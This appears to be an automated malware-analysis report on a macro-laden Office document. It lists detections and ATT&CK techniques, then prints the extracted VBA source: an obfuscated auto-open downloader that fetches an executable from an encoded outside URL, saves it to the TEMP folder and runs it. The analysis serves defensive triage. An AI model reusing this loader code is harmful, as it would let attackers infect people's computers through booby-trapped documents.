Verdict: MALICIOUS
Risk Score: 334

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols

The sample contains heavily obfuscated VBA macros, including an AutoOpen subroutine, which are designed to execute automatically when the document is opened. Critical heuristics indicate potential shell calls and the use of CreateObject, suggesting the execution of arbitrary code. The script attempts to download and write content to files using obfuscated strings, likely to stage a second-stage payload. The presence of the email address 'facepa1m@live.ru' in the document body suggests a potential phishing lure.

Heuristics (12)

- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, 8 related findings, OLE_VBA_MACROS)
  Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Matched line in script:
  WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP")
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script:
  Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  Matched line in script:
  Sub AutoOpen()
- Workbook_Open macro (low, OLE_VBA_WBOPEN)
  Matched line in script:
  Sub Workbook_Open()
- Auto_Open macro (low, OLE_VBA_AUTO)
  Matched line in script:
  Sub Auto_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
  Matched line in script:
  OJFXJUFZDBX StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6578652E312F736567616D692F72612E6D6F632E617372616C67756A2E7777772F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22480 bytes |

SHA-256: 3b045ea11a533d57a5116e251e952424105c0072fdbddbb8d47fc6fd71514746

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 92 of 176 identifiers look randomly generated (e.g. 'F7768657471696F76687973667773616D736B6C6'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo tvietsifxltejgckqmmgmrcbsomenxpjixviepjrspnjwawf
Dim aeqbuamwtqbvjvypcjwyhwgocvnfrhuuhztdmxilnitxlhvz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6A6B656164716A6B766C6B636B7476677A7769746362667862756C6D6E6B70737570796F69636C6C746F746E6B747474")) For Binary As #72550
Put #72550, , aeqbuamwtqbvjvypcjwyhwgocvnfrhuuhztdmxilnitxlhvz
Close #72550
tvietsifxltejgckqmmgmrcbsomenxpjixviepjrspnjwawf:
GoTo ewcjymzoaevdzyvjazueygipodfrxovhdiueruisckivkepj
Dim sgldmvavwxkebsqosfbdzligvdadglkzqvpxylfkakoqpybs As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("746D6F68637665766679707069786A73656B756579626579716F6E6F6D6C746B6666726E687A7077797965786D667974")) For Binary As #67769
Put #67769, , sgldmvavwxkebsqosfbdzligvdadglkzqvpxylfkakoqpybs
Close #67769
ewcjymzoaevdzyvjazueygipodfrxovhdiueruisckivkepj:
GoTo gxeahqpjtncnuuiiifsekwbafaofmqymvifhzyockvkzpqvg
Dim kgrgczrsyrxmnkoyraokqwiqegqfrrywrtzktlpqifapdtvy As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("64747869796D776F656268726F7A7362676277736D6473626C6976776C687670777A636270697479766D626276796166")) For Binary As #46448
Put #46448, , kgrgczrsyrxmnkoyraokqwiqegqfrrywrtzktlpqifapdtvy
Close #46448
gxeahqpjtncnuuiiifsekwbafaofmqymvifhzyockvkzpqvg:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo kjrrpzgsabomhoorpthijdgdaoabcyuzvsrgedwwmsnsuilt
Dim ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7966636E727179746861627661697576616668726B7461776C756E686F666E6C626B757A7064706F746579727664676D")) For Binary As #14926
Put #14926, , ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa
Close #14926
kjrrpzgsabomhoorpthijdgdaoabcyuzvsrgedwwmsnsuilt:
GoTo zxclhhlzyuaqvwvwqjgbpacemvtvqctrbetkqpxtxlyipguh
Dim tgoqwbboxfhncboupxwlmifubvyljuqmfpgcqfmezotebxtu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("646773776B656E7872666D6B686668797A707463676A7A7179666461776E6F6E657A77786F73677865777365647A7377")) For Binary As #66158
Put #66158, , tgoqwbboxfhncboupxwlmifubvyljuqmfpgcqfmezotebxtu
Close #66158
zxclhhlzyuaqvwvwqjgbpacemvtvqctrbetkqpxtxlyipguh:
GoTo tkhhqtykjmddycwbqjacyxjzqdlosoxdbfxsjyjphsxgfcml
Dim ifvrgbyiwkehdashidhbtvoerqhmrxmzdebugxeyzppmjguu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("646665717964676D71766E7976627A7A70736E787A796E676176796E646E6A76756F646B6D636B7875697A7161726478")) For Binary As #18642
Put #18642, , ifvrgbyiwkehdashidhbtvoerqhmrxmzdebugxeyzppmjguu
Close #18642
tkhhqtykjmddycwbqjacyxjzqdlosoxdbfxsjyjphsxgfcml:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo oqmkqvhvgglixxgdeiqugjubjgrtdcfvhkoneujdrfmhowox
Dim izevzwvzxpbbnwiosqkjcyfovxczkxslfvkxxgccublumkfo As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("68787972656A686F6261737A666A7779647770767579696C696661766B636A6B7470626E6F7A7A787471746375746974")) For Binary As #58396
Put #58396, , izevzwvzxpbbnwiosqkjcyfovxczkxslfvkxxgccublumkfo
Close #58396
oqmkqvhvgglixxgdeiqugjubjgrtdcfvhkoneujdrfmhowox:
GoTo hgdvfhmrvyunvofmnaztrdrohoygveofkrvxcuwobwnsxndy
Dim qgbijyndlqbeckbkcbynjvlfyksjytayhdacdvoscyjzcqld As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7573707A76706970717565756B6D63716675677767647278656464627862727369656875676877626F63616774776E62")) For Binary As #45653
Put #45653, , qgbijyndlqbeckbkcbynjvlfyksjytayhdacdvoscyjzcqld
Close #45653
hgdvfhmrvyunvofmnaztrdrohoygveofkrvxcuwobwnsxndy:
GoTo ymzncmuqdcrcounjmauyzgjokauhhxvaqfvdxzqawhldldaq
Dim rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("746B66716E6666797A797A696972657463656868716C746962787065687867687A656563726E7668666D646B776A6C6E")) For Binary As #4136
Put #4136, , rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva
Close #4136
ymzncmuqdcrcounjmauyzgjokauhhxvaqfvdxzqawhldldaq:
Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte
GoTo yvuwsrazyiisipxwfxnmtwdddrxfrxyhpjatavceqitibxcw
Dim noomoioacetxmsbkxbpvdakojfpuwgqkeafeaqfrpntloaze As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6273686E6C637A6A6364666B7466766975626267686B64657962676B77786F6170756C7579627761716D636767777670")) For Binary As #64012
Put #64012, , noomoioacetxmsbkxbpvdakojfpuwgqkeafeaqfrpntloaze
Close #64012
yvuwsrazyiisipxwfxnmtwdddrxfrxyhpjatavceqitibxcw:
GoTo aunblnywsfxrcgmgjymmzpccgpyizhtitprlxayuvznbmusm
Dim xfdphiyuvozyusdfdsmgugnrnjyrpbmwoffjeqfiyqukyocq As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("76656D7366746975706B6A7769666F64676B786B6C6A6677656E696968726E6C6D6779756B756F767161786B77676169")) For Binary As #10771
Put #10771, , xfdphiyuvozyusdfdsmgugnrnjyrpbmwoffjeqfiyqukyocq
Close #10771
aunblnywsfxrcgmgjymmzpccgpyizhtitprlxayuvznbmusm:
GoTo fcujfbuvupxoqdxykcgiirybxsceqjvednkniotwmygvotyg
Dim dylhaesazsntbxtzxybpianywgwuqkebpxwvrzbkueaykfxm As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("726C777766776278646C6E76667764776372656F717A7A64666770736E757A73646662646A6C73666E676B687A6E746A")) For Binary As #54749
Put #54749, , dylhaesazsntbxtzxybpianywgwuqkebpxwvrzbkueaykfxm
Close #54749
fcujfbuvupxoqdxykcgiirybxsceqjvednkniotwmygvotyg:
Set WQTQGAKEBGH = CreateObject(StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("534D")) + "XML2.XM" + "LHTTP")
GoTo etykedjbyspakazrkblfewqzzldfmiyxdwqwjdzbaqxotivm
Dim xmqryjdnjdnhjjyzaakypxoemwzosmzbfbajzdqxbykdnfmf As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697171697166676B7161797565736D7373797766717A6F626F6470726E67726A69706E6F6E76647364787A6E7674736B")) For Binary As #93927
Put #93927, , xmqryjdnjdnhjjyzaakypxoemwzosmzbfbajzdqxbykdnfmf
Close #93927
etykedjbyspakazrkblfewqzzldfmiyxdwqwjdzbaqxotivm:
GoTo tbjfqntgvpeaydjcuxajidnqcamgvpinthdmlfrzibrmyjdq
Dim baznastnamdofjzrqbghyjqhdtexfmhsvekzlukrdmtdoawi As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("666E6A786F62656B6B7A787A736A7A79616A67727978647878796E6D7776647576716C6C77656D656269626872716D73")) For Binary As #99385
Put #99385, , baznastnamdofjzrqbghyjqhdtexfmhsvekzlukrdmtdoawi
Close #99385
tbjfqntgvpeaydjcuxajidnqcamgvpinthdmlfrzibrmyjdq:
GoTo ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa
Dim scxrtmsbbhuxzamqgzlaeiniejfshglmjxkxnycawlrudvxn As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6577676965777565736D6576676B6C6F7A6F647A62766662796E6465736369776873797A79656A626F74667568767062")) For Binary As #49723
Put #49723, , scxrtmsbbhuxzamqgzlaeiniejfshglmjxkxnycawlrudvxn
Close #49723
ewymydynsoxaaizydwxxypcahceqiyyeocotlldbievlatqa:
WQTQGAKEBGH.Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("544547")), XDQPBMZWZVE, False
GoTo zunbokaebjkkpdfsorqdryntqayzlmmtdvjyclgdrvlkfrsn
Dim losjthfhetkotljdoxjkcwybkdqfneiufwwuhmeifwzmlrbp As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("686570657967767165766675627770637970696A62706F6D747A6468726E6E6E65766570776F74766768737A636F6972")) For Binary As #93594
Put #93594, , losjthfhetkotljdoxjkcwybkdqfneiufwwuhmeifwzmlrbp
Close #93594
zunbokaebjkkpdfsorqdryntqayzlmmtdvjyclgdrvlkfrsn:
GoTo jnmaepzvcmcgyemhvjuiqixqroflxqlmjsjlfngdtbkjvtri
Dim cdzjqiclzdbsssxkxipzbaopihjvmswrgtczphetfacsiqrl As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6376756C716F697464666F746E76696669677461796872796E646E7066756473676E7065637873796574667A6962676C")) For Binary As #24967
Put #24967, , cdzjqiclzdbsssxkxipzbaopihjvmswrgtczphetfacsiqrl
Close #24967
jnmaepzvcmcgyemhvjuiqixqroflxqlmjsjlfngdtbkjvtri:
GoTo gykhtvritlsfjqrvyqbtgnhzwmjkbkjcxjypsnejbqunxbjj
Dim artfttcsyfviaqpientxyrcyrbdecdvsrsocvbrvikwbjqyx As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6B6C6F6773627774677772716C69636969727A6F7167737076757068697674706D6A6C787167676769706D6561736A79")) For Binary As #15654
Put #15654, , artfttcsyfviaqpientxyrcyrbdecdvsrsocvbrvikwbjqyx
Close #15654
gykhtvritlsfjqrvyqbtgnhzwmjkbkjcxjypsnejbqunxbjj:
WQTQGAKEBGH.Send "send request"
GoTo iflnsluawvesielvggfzcwfauiswaxumzymhgfcjihlurjuc
Dim jytesgsmhwjvwcyokyimpljuvszduwwtkrirzqyqqdbvuiaz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6A6F6E6470637777657A6A70767561706B7A6C676E656E6B796A787A6167777474697171756465687A796C6666756566")) For Binary As #93215
Put #93215, , jytesgsmhwjvwcyokyimpljuvszduwwtkrirzqyqqdbvuiaz
Close #93215
iflnsluawvesielvggfzcwfauiswaxumzymhgfcjihlurjuc:
GoTo rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva
Dim idyalbclkpypymzqlimrcpwoglbqpnwcucufwuzeqqbzqvjy As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("737973697A6867627A70716F67696F78676E6F746D746B717961766D7361657578656A67726D6F726F6664636A6A6A65")) For Binary As #44516
Put #44516, , idyalbclkpypymzqlimrcpwoglbqpnwcucufwuzeqqbzqvjy
Close #44516
rjdabykawbszwzkcnpbcoxqopjlofzipyqreckvhhtliobva:
Do While WQTQGAKEBGH.readyState <> 4
GoTo jenelkrmoiwjctfgchdugaietjfulqrratojnfidemrzbjct
Dim yzidgrlzdhpsqlcrbkeiipywtmgqfptckpkiddfeaoikwoqe As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6E616E6E66796D73726B6D73616A6A7A757669706876766D6C74676F6F6E66676C62766C78796A647963696863706977")) For Binary As #15346
Put #15346, , yzidgrlzdhpsqlcrbkeiipywtmgqfptckpkiddfeaoikwoqe
Close #15346
jenelkrmoiwjctfgchdugaietjfulqrratojnfidemrzbjct:
GoTo mlovgratjrnllbpqxkpszjhrzcgxzhssgyujodnreoxyuhkz
Dim twxhswfkxzmpffcqxyyjddvbobmglopfgdzkszgafghjxhft As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("616F72626375696C63696E65757A7776647A76696E6C727172737872656B7A617A656A6C656C7A676A6A6A6B7A777170")) For Binary As #79332
Put #79332, , twxhswfkxzmpffcqxyyjddvbobmglopfgdzkszgafghjxhft
Close #79332
mlovgratjrnllbpqxkpszjhrzcgxzhssgyujodnreoxyuhkz:
GoTo cngjophlhlaerzqcqkgqqpsylquqoseevuvtbmtjhbwmmmkd
Dim lybzzpuublebeedhcyuzuiwldyushrlxryyaedbsdxmtbgzz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6B69746A6E617A7875797174757274776767766B736173736D6D6976657A78736164636D756A77666D63727478626879")) For Binary As #54113
Put #54113, , lybzzpuublebeedhcyuzuiwldyushrlxryyaedbsdxmtbgzz
Close #54113
cngjophlhlaerzqcqkgqqpsylquqoseevuvtbmtjhbwmmmkd:
DoEvents
GoTo sksgvmyfbqfqwrjblkiciyqhmlmzqkmllurzlvjggqchnzsx
Dim ydzjpmkquhwcnnnghydbivxqcthmyvvqzoumptaazfhexjrl As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7878656472746E6B716D6B6D7369746E6F777971756372616A77617865676C7275696875757867786F75676872656B71")) For Binary As #31535
Put #31535, , ydzjpmkquhwcnnnghydbivxqcthmyvvqzoumptaazfhexjrl
Close #31535
sksgvmyfbqfqwrjblkiciyqhmlmzqkmllurzlvjggqchnzsx:
GoTo vqalrslhuzphtlsdkbmobrjdssipmscsypzvcdsiydmwazht
Dim nymbxrfxkcoveimsrzmghxuofbznhhopejlrjcaiyvqrrcup As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("676161677868726268706C73697171776372696A69706764626D706D74766A7A6E666C76697963646E7661666B666965")) For Binary As #64724
Put #64724, , nymbxrfxkcoveimsrzmghxuofbznhhopejlrjcaiyvqrrcup
Close #64724
vqalrslhuzphtlsdkbmobrjdssipmscsypzvcdsiydmwazht:
GoTo lagwdpdxntmedbqxmsbtxycbuiwzqumfuqznvqljbvqfpsau
Dim sbuurrvjkcusjbxqzypgmjveqzitglsvwavnmjoeaurcivuv As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7164667A7776736A6A64657168766C64636674726B6E6C7361736E717177706D7A776D65636E6370686D6B706668626A")) For Binary As #26230
Put #26230, , sbuurrvjkcusjbxqzypgmjveqzitglsvwavnmjoeaurcivuv
Close #26230
lagwdpdxntmedbqxmsbtxycbuiwzqumfuqznvqljbvqfpsau:
Loop
GoTo cftqfjesisnvxjpppghxdtbnlsmxoirpatjkixisfgnfdaui
Dim obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6F7768657471696F76687973667773616D736B6C6774717A676C717363677571666C6771756C766B747073627A667372")) For Binary As #45703
Put #45703, , obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg
Close #45703
cftqfjesisnvxjpppghxdtbnlsmxoirpatjkixisfgnfdaui:
GoTo yxhxmqjxguiiokjsfdrpllickkgdsiethftamtqpuvfsubsp
Dim sdtaawgymgkgwhtpeltmhpzqmuyihgychufitikvqaofhydd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697A76706D756C77626574726166666975626478726B72656C7A67686173677079757A716266676D6C6F796470756D62")) For Binary As #76073
Put #76073, , sdtaawgymgkgwhtpeltmhpzqmuyihgychufitikvqaofhydd
Close #76073
yxhxmqjxguiiokjsfdrpllickkgdsiethftamtqpuvfsubsp:
GoTo xzdxhkqykhjnkdksqillbkfapoxvnoplarrupaeqprmlklpr
Dim vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6877787669646A666164697A616F686E6F6D616969796B7462756D786A6E6262767A70626373726575626A7862746D6C")) For Binary As #36412
Put #36412, , vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz
Close #36412
xzdxhkqykhjnkdksqillbkfapoxvnoplarrupaeqprmlklpr:
WGZWKGZMUTY = WQTQGAKEBGH.responseBody
GoTo whrtdopgfyarcmoxdznzdkbrudivbgclczkufqaafarplvxq
Dim ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("776979626A6F77646572727161776267747468677876797762707476686C726A6E74667A706771757966666B6D6C6477")) For Binary As #36932
Put #36932, , ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln
Close #36932
whrtdopgfyarcmoxdznzdkbrudivbgclczkufqaafarplvxq:
GoTo cviwofypzrfkpcitpvyvxymevgcavmslffjkmyhnzrfjzncw
Dim wfpwlsdejymosxzqggezbxojbjvngupdmxvshzcrfvqibhis As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("797365756E67747273746A736A7676626A74736A697674637264706F646C6F656A627272657679737978797078766876")) For Binary As #52543
Put #52543, , wfpwlsdejymosxzqggezbxojbjvngupdmxvshzcrfvqibhis
Close #52543
cviwofypzrfkpcitpvyvxymevgcavmslffjkmyhnzrfjzncw:
GoTo kfoeuzrhmobunubpzfucazzrpxlpqakrysyutriugvvdkdyg
Dim znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6D7A6870756E767176666A756D6F6B6361706F7A6C6A78626E7862687262727A667764736E6C6D6C657A69736B676262")) For Binary As #85087
Put #85087, , znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr
Close #85087
kfoeuzrhmobunubpzfucazzrpxlpqakrysyutriugvvdkdyg:
JFDTBJWPCNU = FreeFile
GoTo dvxcjrcqpmppjgataoipuumtuqudsvzmtuojmwyoyllgcejr
Dim mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("697972766D676A7A657A65637A6B626F78716B736A6C626E7874666B716363686D72737771687363666A796F6B6B6772")) For Binary As #52213
Put #52213, , mfdblsyasdkumqldmlnmthdtailymcyopcjuamsvqulpgjff
Close #52213
dvxcjrcqpmppjgataoipuumtuqudsvzmtuojmwyoyllgcejr:
GoTo qksfssrpvyzhbgsfofhrrirpxcclktlqvnvwvphivfahkors
Dim hhkdszcfbqtoigknyzvpcgfyvpprjlnutxatpojjudvgzdxu As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6479656F6C6C687274676A68616D747068796D73777862646362777275686B636A636677777677747070686D6D786D7A")) For Binary As #21932
Put #21932, , hhkdszcfbqtoigknyzvpcgfyvpprjlnutxatpojjudvgzdxu
Close #21932
qksfssrpvyzhbgsfofhrrirpxcclktlqvnvwvphivfahkors:
GoTo xtnntzfnjirgnvgkkbfexcwpniqavuwfmdbfmqhxknktqbsy
Dim unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("656963646868796B7A756F627372626977756C6C6C64746C637A626462626B766C736276657468726967697870767865")) For Binary As #94786
Put #94786, , unxmprovrhopbqarieqvsezbviwrzwjihqtonxwojkkqytan
Close #94786
xtnntzfnjirgnvgkkbfexcwpniqavuwfmdbfmqhxknktqbsy:
If Dir(EBDHKIKBOCB) <> StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("")) Then Kill EBDHKIKBOCB
Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
Put #JFDTBJWPCNU, , WGZWKGZMUTY
Close #JFDTBJWPCNU
GoTo zvhlmxngcwdplmebjvnvfslubgunooafoqqhrvmnzsxxpive
Dim oykwcqeuinjafltacteansekjvvndegfqjspgqqnwqrqxemk As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6369706B68656F656D796A646461787862746C6F78797A706A65746E736E7773767563647A646E697762746264716579")) For Binary As #66433
Put #66433, , oykwcqeuinjafltacteansekjvvndegfqjspgqqnwqrqxemk
Close #66433
zvhlmxngcwdplmebjvnvfslubgunooafoqqhrvmnzsxxpive:
GoTo vugfguuculrmcygvqofyanmqcdsysdfhudllyzkhniohbgce
Dim todkoejyvdojjvfstsvlyihddmylxolxrcttirjghwxgocee As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6D6866756B6A7264656773666D65796971626B696A69666B716176686868757A776F786D6D6D66726666627567696573")) For Binary As #17433
Put #17433, , todkoejyvdojjvfstsvlyihddmylxolxrcttirjghwxgocee
Close #17433
vugfguuculrmcygvqofyanmqcdsysdfhudllyzkhniohbgce:
GoTo kpdizktstaknibldzbygeeqiewmrkfhilpigziuqatagyjmm
Dim fjshjbsjssevacjjprwnrzduyzipwbhbkkkhsdvcllwvomri As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6662687166686E6F71797962716B776A616171727775617463746F6B6C6B6E6D66777465697173637178656979686C69")) For Binary As #37495
Put #37495, , fjshjbsjssevacjjprwnrzduyzipwbhbkkkhsdvcllwvomri
Close #37495
kpdizktstaknibldzbygeeqiewmrkfhilpigziuqatagyjmm:
Dim WBVSWOEAZVI
GoTo obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg
Dim llisqzvgbrzirlvtggitxfcvccujdgkgqgmqqsaivpoxjqtd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("796F746674777075706866736C7378637079666978767268776F746C68766A657264676C776F77746F78696164767565")) For Binary As #37803
Put #37803, , llisqzvgbrzirlvtggitxfcvccujdgkgqgmqqsaivpoxjqtd
Close #37803
obwywvqhdbncpbipdxdkbhpkywbytytichqsxxktfcdtgadg:
GoTo acdzmexadpyjfwdnllfvvgtfbpmrckccufdctixgjkipvaob
Dim dcsztvhicaobtmssdfdowdzlbtcgqkozoujpdcqfyghdwcfg As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6F6973726F75697A6E786D726D6A62717070656F6E676475626E786376636B71656F73706973616A756C6F706B6F786A")) For Binary As #87419
Put #87419, , dcsztvhicaobtmssdfdowdzlbtcgqkozoujpdcqfyghdwcfg
Close #87419
acdzmexadpyjfwdnllfvvgtfbpmrckccufdctixgjkipvaob:
GoTo vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz
Dim pkalhllqyyttauhldsfnrtdfvxkxieytstktuikxkgbebcoq As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("76647375707A636F716D66776F6C69616971626F726A73787174656A6C61746C68716A656A65746C7261767570677168")) For Binary As #45331
Put #45331, , pkalhllqyyttauhldsfnrtdfvxkxieytstktuikxkgbebcoq
Close #45331
vuzsaoqbeyusckmwirtwvqypcbogqxnmhxufujigjdbgwolz:
WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
GoTo ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln
Dim hrfarvprcnlkpiqfysyoffssluvjamqmwgaylboqazosdhyc As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6C687275627561737776786B6E6170767A7062756475657861737567707362636D65666F61676E636A6861797A687173")) For Binary As #27456
Put #27456, , hrfarvprcnlkpiqfysyoffssluvjamqmwgaylboqazosdhyc
Close #27456
ubuxxnchwwznfvctmpjopqdahujgqrmgmsqndpyftuwjiqln:
GoTo nqakatzcqsccbbahspnrewrjsvrwtsomigbpwkiuvmyxttix
Dim fhrleckfhvlcsfrzeiafiltjtbaddjwfoiawautcavgbgral As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("7678636461696D7666656774766D7176706162626164647A796B796B6D71687073617378746F62637A676B71686D6D6F")) For Binary As #96511
Put #96511, , fhrleckfhvlcsfrzeiafiltjtbaddjwfoiawautcavgbgral
Close #96511
nqakatzcqsccbbahspnrewrjsvrwtsomigbpwkiuvmyxttix:
GoTo znyzccirnmmhvmxxtlhkxhuqhhbyerisfmoohsosfwysinhr
Dim kqmrhxurssufslgwruvbekdofvnvcmbfvxlcdhpzkseagovd As String
Open StrReverse(aqntagpcjhrfbbtxbqhsttsrgcryinsehivqwktvpgieowrw("6970737277726D6D6B717267776A7A78747A716E767171646B6F6B7A6973767068676F756377646A7663796D746E7374")) For Binary As #33966
Put #33966, , kqmrhxurssufslgwruvbekdofvnvcmbfvxlcdhpzkseagovd
Close #33966
